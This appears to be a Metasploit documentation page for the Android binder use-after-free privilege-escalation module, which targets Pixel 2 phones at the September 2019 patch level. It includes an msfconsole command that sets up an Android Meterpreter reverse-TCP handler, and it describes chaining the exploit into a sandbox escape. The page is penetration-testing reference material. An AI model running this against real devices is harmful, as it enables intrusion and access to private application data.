Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/android/local/binder_uaf.md
Views: 11624
Vulnerable Application
This exploit module currently targets a very specific build of Android on specific set of hardware targets:
Google Pixel 2 or Pixel XL 2 phones running the September 2019 security patch level.
This exploit module would have to be retargeted for any other potentially vulnerable build or hardware target.
One difficult issue with the Google Pixel 2 is that, while many Google phones have an unlocked bootloader, making it easy to download older Android revisions, the latest Pixel 2 updates show this feature has been disabled or broken older revisions to the device firmware. This may be a firmware bug or intentional, but Google themselves do not appear to have an answer for the problem. For testing, you may need a phone never updated to a later Android revision.
Verification Steps
Get an android meterpreter session on a Pixel 2 or Pixel XL 2 with the right kernel:
msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j
Currently this only works on the Pixel 2 (and Pixel 2 XL) with september 2019 Security patch level. Validate the kernel version looks like this:
Run the exploit:
Verify the new session can read and write private application data (in /data/data/..../)
Scenarios
This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.